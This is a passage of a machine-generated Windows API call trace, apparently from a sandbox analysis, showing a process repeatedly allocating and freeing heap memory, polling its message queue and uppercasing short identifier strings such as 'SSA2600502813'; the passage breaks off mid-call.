PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0103.314] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0103.314] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80c1) returned 0x2a7a130 [0103.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0103.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80c1) returned 0x2a8a2d0 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0103.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0103.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0103.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0103.317] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0103.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0103.317] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.318] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0103.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.319] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0103.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.320] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0103.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0103.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0103.321] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0103.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0103.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.321] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0103.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0103.321] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0103.322] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0103.322] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0103.322] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0103.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 